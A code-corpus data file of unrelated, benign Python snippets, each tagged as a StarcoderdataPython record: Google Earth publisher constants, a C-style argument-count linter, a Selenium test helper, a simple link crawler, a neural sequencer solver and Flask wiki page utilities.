QUERY_CMD = "QueryCmd"
QUERY_CMD_LIST_DBS = "ListDbs"
QUERY_CMD_LIST_ASSETS = "ListAllAssets"
QUERY_CMD_DB_DETAILS = "DbDetails"
QUERY_CMD_LIST_VSS = "ListVss"
QUERY_CMD_VS_DETAILS = "VsDetails"
QUERY_CMD_LIST_TGS = "ListTgs"
QUERY_CMD_TARGET_DETAILS = "TargetDetails"
QUERY_CMD_LIST_SEARCH_DEFS = "ListSearchDefs"
QUERY_CMD_SEARCH_DEF_DETAILS = "SearchDefDetails"
QUERY_CMD_LIST_SNIPPET_SETS = "ListSnippetSets"
QUERY_CMD_SNIPPET_SET_DETAILS = "SnippetSetDetails"
QUERY_CMD_LIST_META_FIELD_PATHS = "ListMetaFieldPaths"
QUERY_CMD_META_FIELDS_SET = "MetaFieldsSet"
QUERY_CMD_PUBLISHED_DB_DETAILS = "PublishedDbDetails"
QUERY_CMD_PUBLISHED_DBS = "PublishedDbs"
QUERY_CMD_SERVER_PREFIX = "ServerPrefix"
QUERY_CMD_HOST_ROOT = "HostRoot"
QUERY_CMD_SERVER_HOST = "ServerHost"
QUERY_CMD_ALLOW_SYM_LINKS = "AllowSymLinks"
QUERY_CMD_LIST_PLUGIND = "ListPlugins"
QUERY_CMD_GEDB_PATH = "GeDbPath"
DB_ID = "DbId"
DB_NAME = "DbName"
DB_PRETTY_NAME = "DbPrettyName"
DB_TYPE = "DbType"
DB_TIMESTAMP = "DbTimestamp"
DB_SIZE = "DbSize"
DB_USE_GOOGLE_BASEMAP = "DbUseGoogleBasemap"
FILE_PATH = "FilePath"
FILE_SIZE = "FileSize"
VS_NAME = "VsName"
VS_TYPE = "VsType"
VS_URL = "VsUrl"
VS_SSL = "VsSsl"
VS_CACHE_LEVEL = "VsCacheLevel"
PLUGIN_NAME = "PluginName"
CLASS_NAME = "ClassName"
SEARCH_URL = "SearchUrl"
SEARCH_VS_NAME = "SearchVsName"
DEST_FILE_PATH = "DestFilePath"
FORCE_COPY = "ForceCopy"
PREFER_COPY = "PreferCopy"
TARGET_PATH = "TargetPath"
TARGET_PATH_A = "TargetPathA"
TARGET_PATH_B = "TargetPathB"
VIRTUAL_HOST_NAME = "VirtualHostName"
SEARCH_DEF_NAME = "SearchDefName"
SUPPLEMENTAL_SEARCH_DEF_NAME = "SupSearchDefName"
SEARCH_DEF = "SearchDef"
POI_FEDERATED = "PoiFederated"
POI_SUGGESTION = "PoiSuggestion"
NEED_SEARCH_TAB_ID = "NeedSearchTabId"
SUPPLEMENTAL_UI_LABEL = "SupUiLabel"
SNIPPET_SET_NAME = "SnippetSetName"
SNIPPET_SET = "SnippetSet"
SERVE_WMS = "ServeWms"
EC_DEFAULT_DB = "EcDefaultDb"
ORIGIN_REQUEST_HOST = "OriginRequestHost"
# Response header names.
HDR_STATUS_CODE = "Gepublish-StatusCode"
HDR_STATUS_MESSAGE = "Gepublish-StatusMessage"
HDR_FILE_NAME = "Gepublish-FileName"
HDR_PLUGIN_DETAILS = "Gepublish-PluginDetails"
HDR_HOST_NAME = "Gepublish-HostName"
HDR_DB_NAME = "Gepublish-DbName"
HDR_DB_PRETTY_NAME = "Gepublish-DbPrettyName"
HDR_TARGET_PATH = "Gepublish-TargetPath"
HDR_VS_TYPE = "Gepublish-VsType"
HDR_VS_NAME = "Gepublish-VsName"
HDR_SERVER_PREFIX = "Gepublish-ServerPrefix"
HDR_SERVER_HOST = "Gepublish-ServerHost"
HDR_SERVER_HOST_FULL = "Gepublish-ServerHostFull"
HDR_ALLOW_SYM_LINKS = "Gepublish-AllowSymLinks"
HDR_VS_URL = "Gepublish-VsUrl"
HDR_DB_ID = "Gepublish-DbId"
HDR_HOST_ROOT = "Gepublish-HostRoot"
HDR_DELETE_COUNT = "Gepublish-DeleteCount"
HDR_DELETE_SIZE = "Gepublish-DeleteSize"
HDR_SEARCH_URL = "Gepublish-SearchUrl"
HDR_PLUGIN_NAME = "Gepublish-PluginName"
HDR_PLUGIN_CLASS_NAME = "Gepublish-PluginClassName"
HDR_DATA = "Gepublish-Data"
HDR_JSON_RESULTS = "results"
HDR_JSON_STATUS_CODE = "status_code"
HDR_JSON_STATUS_MESSAGE = "status_message"
# TODO: Get from mod_fdb!?
CUTTER_GLOBES_PATH = "/opt/google/gehttpd/htdocs/cutter/globes"
# Response status codes.
STATUS_FAILURE = -1
STATUS_SUCCESS = 0
STATUS_UPLOAD_NEEDED = 1
|
StarcoderdataPython
|
3447483
|
try:
from normatrix.source.file_parser import CFileParse
from normatrix.source.config import TypeLine
except ModuleNotFoundError:
from normatrix.normatrix.source.file_parser import CFileParse
from normatrix.normatrix.source.config import TypeLine
import re
reg = re.compile(r'^(?!.*=)(\w{1,} {0,1}){2,}\((.*?\n{0,1}){0,}?\) {0,1}\n{0,1}\{')
def get_only_func_decl(rest: str):
res = reg.match(rest)
if res != None:
only_decl = rest[res.start():res.end()]
if "=" in only_decl or ";" in only_decl:
return ''
return only_decl
return ''
def check(context, file: CFileParse) -> (int, int, list):
nb_error = 0
list_error = []
if file.basename.endswith('.h') or file.filepath.endswith("Makefile"):
return (0, 0, [])
for i, line in enumerate(file.sub_parsedline):
if line[0] == TypeLine.COMMENT:
continue
all_lines = file.sub_parsedline[i:]
rest_lines = "\n".join([x[1] for x in all_lines])
only_decl = get_only_func_decl(rest_lines)
only_decl = re.sub("\(\*\w*?\)\((.|\n)*?\)", "", only_decl)
n = only_decl.count(',') + 1
if n > 4:
list_error.append((i + 1, f"too many arguments ({n} > 4)"))
nb_error += 1
return (nb_error, 0, list_error)
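# Hypothetical quick check of the declaration regex (only meaningful inside the normatrix package,
# since the imports above require it):
#   sample = "int add(int a, int b, int c, int d, int e)\n{\n    return a + b;\n}"
#   get_only_func_decl(sample)   # -> the declaration up to the opening brace; check() would flag 5 args > 4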
|
StarcoderdataPython
|
3204007
|
<filename>vscreenml_v2/binana/_cli_params/__init__.py<gh_stars>0
# This file is part of BINANA, released under the Apache 2.0 License. See
# LICENSE.md or go to https://opensource.org/licenses/Apache-2.0 for full
# details. Copyright 2020 <NAME>.
|
StarcoderdataPython
|
1784457
|
from datetime import date
trab = {}
trab["Nome"] = str(input("Nome: "))
Nascimento = int(input("Ano de nascimento: "))
trab["idade"] = date.today().year - Nascimento
trab["CTPS"] = int(input("CTPS (0 não tem): "))
if trab["CTPS"] == 0:
print(30*'-=')
print(trab)
print(f"Nome tem o valor de {trab['Nome']} \nIdade tem o valor de {trab['idade']} \nCTPS tem o valor de {trab['CTPS']}")
else:
trab["Contratação"] = int(input("Ano de contratação: "))
trab["Salario"] = float(input('Salário: R$ '))
contribuido = (date.today().year - trab['Contratação'])
aposentadoria = (35 - contribuido) + trab["idade"]
print(30*'-=')
print(trab)
print(f"Nome tem o valor {trab['Nome']} \nIdate tem o valor de {trab['idade']} \nCTPS tem o valor de {trab['CTPS']}, \nContratação tem o valor de {trab['Contratação']} \nSalário tem o valor de {'Salario'} \nAposentadoria tem o valor de {aposentadoria}")
#aposentadoria: necessário 35 anos de contribuição a partir da data do primeiro registro
# exemplo: idade: 40, contribuiçao: 25 anos
#trab["Aposentadoria"] = 17
|
StarcoderdataPython
|
6557537
|
<reponame>objarni/remind-tests<filename>browser.py
# coding: utf-8
# Standard
import time
# Third party
from selenium import webdriver
class BrowserSimulator():
def __init__(self, headless=True):
if headless:
from pyvirtualdisplay import Display
display = Display(visible=0, size=(800, 600))
display.start()
self.driver = webdriver.Firefox()
def go_to(self, url):
print u"Going to %s. " % url
self.driver.get(url)
def fill_in(self, name, text):
print u"Writing '%s' in textarea named '%s'." % (text, name)
e = self.driver.find_element_by_name(name)
e.clear()
e.send_keys(text)
def click_button(self, name):
print u"Clicking button named '%s'." % name
e = self.driver.find_element_by_name(name)
e.click()
def click_link(self, id):
print u"Clicking link '%s'." % id
e = self.driver.find_element_by_id(id)
e.click()
def get_title(self):
print u"Title is '%s'." % self.driver.title
return self.driver.title
def get_text(self, id):
e = self.driver.find_element_by_id(id)
text = e.text
print u"Element '%s' text is '%s'." % (id, text)
return text
def verify_title(self, title):
def condition():
return self.get_title() == title
wait_for(condition, u"Expected title to show up: " + title)
def verify_text(self, id, text):
def condition():
return text in self.get_text(id)
wait_for(condition, u"Expected text to show up: " + text)
def verify_text_gone(self, id, text):
def condition():
return text not in self.get_text(id)
wait_for(condition, u"Expected text to disappear: " + text)
def close_browser(self):
print "Closing browser."
self.driver.close()
def wait_for(predicate, exception_text):
timeout = 3
acc = 0
while acc < timeout:
if predicate():
return
time.sleep(1)
acc += 1
raise Exception(exception_text)
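# Hypothetical usage sketch (requires Firefox with geckodriver and, for headless mode, pyvirtualdisplay):
#   b = BrowserSimulator(headless=False)
#   b.go_to("http://example.com")
#   b.verify_title("Example Domain")
#   b.close_browser()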
|
StarcoderdataPython
|
6992
|
import requests
from bs4 import BeautifulSoup
def recursiveUrl(url, link, depth):
if depth == 5:
return url
else:
print(link['href'])
page = requests.get(url + link['href'])
soup = BeautifulSoup(page.text, 'html.parser')
        newlink = soup.find('a', href=True)
        if newlink is None:
            return link
else:
return link, recursiveUrl(url, newlink, depth + 1)
def getLinks(url):
    page = requests.get(url)
    soup = BeautifulSoup(page.text, 'html.parser')
    links = soup.find_all('a', href=True)
    # Collect results separately: appending to `links` while iterating over it never terminates.
    results = []
    for link in links:
        results.append(recursiveUrl(url, link, 0))
    return results
links = getLinks("http://www.reddit.com/")
print(links)
|
StarcoderdataPython
|
8167195
|
from django.contrib import admin
from .models import Message
class MessageAdmin(admin.ModelAdmin):
list_display = ('message', 'room', 'created')
admin.site.register(Message, MessageAdmin)
|
StarcoderdataPython
|
8096850
|
import unittest
from yomi.main import convert
class YomiTestCase(unittest.TestCase):
def setUp(self):
print("setUp!!")
def tearDown(self):
print("tearDown!!")
def test_yakiniku(self):
self.assertEqual(convert('焼肉定食'), ['ヤ', 'キ', 'ニ', 'k', 'テ', 'イ', 'シ', 'ョ', 'k'])
|
StarcoderdataPython
|
6472196
|
import numpy as np
from layer import Layer
from coder import Coder
class Sequencer(object):
def __init__(self, sequence_layer, input_layers):
self.sequence_layer = sequence_layer
self.input_layers = input_layers
self.transits = []
def add_transit(self, new_state=None, **input_states):
# Generate states if not provided, encode as necessary
if new_state is None:
new_state = self.sequence_layer.activator.make_pattern()
if type(new_state) is str:
new_state = self.sequence_layer.coder.encode(new_state)
for name, pattern in input_states.items():
if type(pattern) is str:
input_states[name] = self.input_layers[name].coder.encode(pattern)
# Check for non-determinism
for n, i in self.transits:
# Same new state
if self.sequence_layer.activator.e(n, new_state).all(): continue
# Different input layers
if set(i.keys()) != set(input_states.keys()): continue
# Different input patterns
if any((i[l] != p).any() for l,p in input_states.items()): continue
# Otherwise non-deterministic
raise Exception("Created non-deterministic transit!")
# Save transit
self.transits.append((new_state, input_states))
# Return new state
return new_state
def flash(self, verbose):
# Unzip transits
all_new_states, all_input_states = zip(*self.transits)
P = len(self.transits)
# Populate input matrices
X = {}
for i, input_states in enumerate(all_input_states):
for name, pattern in input_states.items():
if name not in X: X[name] = np.zeros((pattern.shape[0]+1, P))
X[name][:-1, [i]] = pattern
X[name][-1, i] = 1. # bias
# Fix layer order, make sure sequence layer comes first for zsolve
# explicitly convert to list for python3
names = list(X.keys())
names.remove(self.sequence_layer.name)
names.insert(0, self.sequence_layer.name)
# Solve with hidden step
X = np.concatenate([X[name] for name in names], axis=0)
Y = np.concatenate(all_new_states, axis=1)
W, Z, residual = zsolve(X, Y,
self.sequence_layer.activator.f,
self.sequence_layer.activator.g,
verbose=verbose)
# Split up weights and biases
weights = {}
biases = {}
offset = 0
for name in names:
pair_key = (self.sequence_layer.name, name)
layer_size = self.input_layers[name].size
weights[pair_key] = W[:,offset:offset + layer_size]
biases[pair_key] = W[:,[offset + layer_size]]
offset += layer_size + 1
# return final weights, bias, matrices, residual
return weights, biases, (X, Y, Z), residual
def zsolve(X, Y, f, g, verbose=False):
"""
Construct W that transitions states in X to corresponding states in Y
X, Y are arrays, with paired activity patterns as columns
f, g are the activation function and its inverse
To deal with low-rank X, each transition uses an intermediate "hidden step"
"""
# size of layer being sequenced
N = Y.shape[0]
# for low-rank X, get coefficients A of X's column space
_, sv, A = np.linalg.svd(X, full_matrices=False)
rank_tol = sv.max() * max(X.shape) * np.finfo(sv.dtype).eps # from numpy
A = A[sv > rank_tol, :]
# use A to set intermediate Z that is low-rank pre non-linearity
Z = np.zeros(X.shape)
Z[:N,:] = f(np.random.randn(N, A.shape[0]).dot(A))
Z[N,:] = 1. # bias
# solve linear equations
XZ = np.concatenate((X, Z), axis=1)
ZY = np.concatenate((Z[:N,:], Y), axis=1)
W = np.linalg.lstsq(XZ.T, g(ZY).T, rcond=None)[0].T
residual = np.fabs(ZY - f(W.dot(XZ))).max()
if verbose: print("Sequencer flash residual = %f"%residual)
# solution and hidden patterns
return W, Z, residual
if __name__ == '__main__':
np.set_printoptions(linewidth=200, formatter = {'float': lambda x: '% .2f'%x})
N = 8
PAD = 0.05
from activator import *
act = tanh_activator(PAD, N)
# act = logistic_activator(PAD, N)
c = Coder(act)
g = Layer("gates",N, act, c)
input_layers = {name: Layer(name, N, act, c) for name in ["gates","op1","op2"]}
s = Sequencer(g, input_layers)
v_old = g.coder.encode("SET") # s.add_transit(new_state="SET")
for to_layer in ["FEF","SC"]:
for from_layer in ["FEF","SC"]:
v_new = s.add_transit(
new_state = to_layer + from_layer,
gates = v_old, op1 = to_layer, op2 = from_layer)
print(c.list_tokens())
    weights, biases, _, residual = s.flash(verbose=True)
for k in weights:
w, b = weights[k], biases[k]
print(k)
print(w)
print(b.T)
a = {"gates":v_old, "op1":c.encode("SC"), "op2":c.encode("SC")}
wvb = np.zeros(v_old.shape)
for k in weights:
w, b = weights[k], biases[k]
wvb += w.dot(a[k[1]]) + b
z = np.zeros(v_old.shape)
a = {"gates":act.f(wvb), "op1": z, "op2":z}
wvb = np.zeros(v_old.shape)
for k in weights:
w, b = weights[k], biases[k]
wvb += w.dot(a[k[1]]) + b
v_test = act.f(wvb)
for v in [v_old, v_test, v_new]:
print(c.decode(v), v.T)
print(act.e(v_test, v_new).T)
|
StarcoderdataPython
|
165477
|
<filename>scrawl/pages_utils.py
import os
from flask import current_app, safe_join
from scrawl.utils import find_pages, full_directory_remove
def get_pages(work_directory: str):
pages = []
dir_content = os.listdir(work_directory)
for name in dir_content:
fullname = os.path.join(work_directory, name)
if os.path.isdir(fullname):
pages.append(name)
return pages
def get_sub_pages(page_name: str, sub_name_pages: list, work_directory: str):
pages = []
dir_content = os.listdir(os.path.join(work_directory, page_name))
for name in dir_content:
fullname = os.path.join(work_directory, page_name, name)
if os.path.isdir(fullname):
pages.append(name)
return pages
def update_page(content: str, page_name: str, work_directory: str):
full_file_path = safe_join(work_directory, page_name, 'content.html')
if os.path.exists(full_file_path): # Checking for page existence
with open(full_file_path, 'w', encoding='utf-8') as f:
f.write(content)
return True
return False
def get_page(page_name: str, work_directory: str):
full_file_path = safe_join(work_directory, page_name, 'content.html')
if os.path.exists(full_file_path): # Checking for page existence
with open(full_file_path, 'r', encoding='utf-8') as f:
content = f.read()
page_name, sub_name_pages = find_pages(page_name)
sub_pages = get_sub_pages(
page_name=page_name,
sub_name_pages=sub_name_pages,
work_directory=work_directory
)
page = {
'content': content,
'sub_pages': sub_pages,
'finding_pages': (page_name, sub_name_pages)
}
return page
return False
def get_pages_info(work_directory: str):
pages = get_pages(work_directory=work_directory)
with_sub_pages = []
for name in pages:
page_directory = os.path.join(work_directory, name)
flag = False
for sub_page_name in os.listdir(page_directory):
if os.path.isdir(os.path.join(page_directory, sub_page_name)):
flag = True
break
if flag:
with_sub_pages.append(name)
return with_sub_pages
def create_page(page_name: str, work_directory: str):
directory_path = os.path.join(work_directory, page_name)
page_path = safe_join(directory_path, 'content.html')
if not os.path.exists(os.path.join(work_directory, page_name)): # Checking for page existence
os.makedirs(directory_path)
with open(page_path, 'a+', encoding='utf-8') as f:
create_text = current_app.config['DEFAULT_TEXT']
f.write(create_text)
return True
return False
def create_sub_page(page_name: str, sub_page_name: str, new_sub_page_name: str, work_directory: str):
directory_params = [work_directory, page_name]
# if sub_page_name:
# directory_params.append(sub_page_name)
if new_sub_page_name:
directory_params.append(new_sub_page_name)
page_directory_path = safe_join(work_directory, page_name)
full_directory_path = safe_join(*directory_params)
full_file_path = safe_join(full_directory_path, 'content.html')
print(full_directory_path, full_file_path)
if os.path.exists(page_directory_path): # Checking for page existence
if os.path.exists(full_directory_path):
return True
os.makedirs(full_directory_path)
with open(full_file_path, 'a+', encoding='utf-8') as file:
create_text = current_app.config['DEFAULT_TEXT']
file.write(create_text)
return True
return False
def rename_page(new_page_name: str, page_name: str, sub_page_name: str, work_directory: str):
directory_params = [work_directory, page_name]
if sub_page_name:
directory_params.append(sub_page_name)
full_directory_path = safe_join(*directory_params)
if os.path.exists(full_directory_path): # Checking for page existence
new_path = os.path.join(os.path.dirname(full_directory_path), new_page_name)
os.rename(full_directory_path, new_path)
return True
return False
def delete_page(page_name: str, sub_page_name: str, work_directory: str):
directory_params = [work_directory, page_name]
if sub_page_name != 'null':
directory_params.append(sub_page_name)
file_params = directory_params + ['content.html']
full_directory_path = safe_join(*directory_params)
full_file_path = safe_join(*file_params)
if os.path.exists(full_file_path): # Checking for page existence
full_directory_remove(path=full_directory_path, work_directory=work_directory)
if sub_page_name != 'null':
return True
return False
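# Hypothetical usage sketch (needs an active Flask application context, since create_page reads
# current_app.config['DEFAULT_TEXT']; the work_directory path is a placeholder):
#   create_page('home', work_directory='/tmp/wiki')
#   update_page('<p>hello</p>', 'home', work_directory='/tmp/wiki')
#   get_page('home', work_directory='/tmp/wiki')   # -> {'content': ..., 'sub_pages': [...], ...}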
|
StarcoderdataPython
|